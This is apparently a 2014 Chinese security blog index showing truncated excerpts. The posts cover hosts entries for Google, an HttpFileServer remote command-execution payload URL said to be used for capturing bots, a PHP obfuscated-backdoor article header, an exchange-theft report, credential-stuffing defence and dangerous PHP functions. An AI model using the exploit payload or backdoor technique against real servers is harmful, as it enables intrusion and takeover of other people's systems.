admin 发布于 2014-09-24 07:38
====更新分界线,复制下面内容到hosts文件即可======
#Google Services START
#GoogleAccounts↓
64.233.168.84 accounts.google.com
64.233.168.84 accounts.l.google.com
#GoogleAccounts↑
#www.goog...
admin 发布于 2014-09-12 13:41
从某论坛看见的,转载部分:
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。
http://localhost:80/?search==%00{.exec|cmd.}
http://localhost:80/search=%00{.exec|cmd.}
注:有些版本search前面是没有?的。...
admin 发布于 2014-08-26 02:29
#Google Services START
#Googleapis↓
61.19.1.54 mt0.googleapis.com
61.19.1.54 mt1.googleapis.com
61.19.1.54 mt2.googleapis.com
61.19.1.54 mt3.googleapis.com
61.19.1.54 mts0.goo...
admin 发布于 2014-08-23 07:27
.::PHP中使用按位取反(~)函数创建后门::.
We enjoy hacking of life in day and night.
_______________________________________________
[+] Author: Evi1m0 <evi1m0.bat#gmail.com>
[+] Team: FF0...
admin 发布于 2014-08-20 07:23
就在2014年8月15日晚,国内著名的山寨币交易所比特儿遭到攻击,被盗5000万个NXT(未来币)。本事件一波三折,目前还在发酵中,但一场完全透明却匿名的网络犯罪却呈现在我们面前,这是历史上的首次。我们继续关注事件的进展。
在事件处置过程中,交易所暴露出安全性严重缺失,POS币钱包在线安全隐患严重等问题。帐号被盗后,交易...
admin 发布于 2014-08-16 11:25
0x00 背景
撞库扫号攻击已经是Top 10 Security Risks for 2014之一,不管你的网站密码保存的额多好,但是面试已经泄露的账号密码,撞库扫号防御还是一个相当重要的环节。之前一篇普及了扫号的基本防止防范和危害。
本篇讲详细解决...
admin 发布于 2014-08-11 09:00
导出路径最好写绝对路径
<%@ page language="java" import="java.util.*,java.sql.*,java.io.*"
pageEncoding="utf-8"%>
<%
String path = request.getContextPath();
String basePath = r...
admin 发布于 2014-08-09 13:05
USB存储设备(U盘)几乎是所有PC用户的必备配件,当然我们也听说过它可以传播电脑病毒,比如你的电脑上感染了某种病毒,它可能会偷偷复制到移动存储
设备上,从而造成传播。但基本上,大部分杀毒软件也具有主动式查杀U盘的功能,当你插入U盘,杀毒软件就会对其进行扫描,保证PC安全。
不过事实证明,自动传播病毒并非是U盘的唯一漏洞。在2014黑帽技术大会上(计算机安...
admin 发布于 2014-08-08 02:23
phpinfo()
功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。
危险等级:中
passthru()
功能描述:允许执行一个外部程序并回显输出,类似于 exec()。
危险等级:高
exec()
功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。
危险等级:高
system()
...
admin 发布于 2014-07-29 08:52
7月29日下午消息,目前新浪SAE上的云服务均已不能打开,DNS也无法解析,打开sinaapp.com网址页面,我们可以得到的仍然是:“连接超时”。
据微博@互联网的那点事爆料,新浪云计算服务SAE的域名sinaapp.com已经到期一个月,因忘记续费导致域名商回收域名,而更为让人汗颜的是,godaddy域名注册商已自行将sinaap...
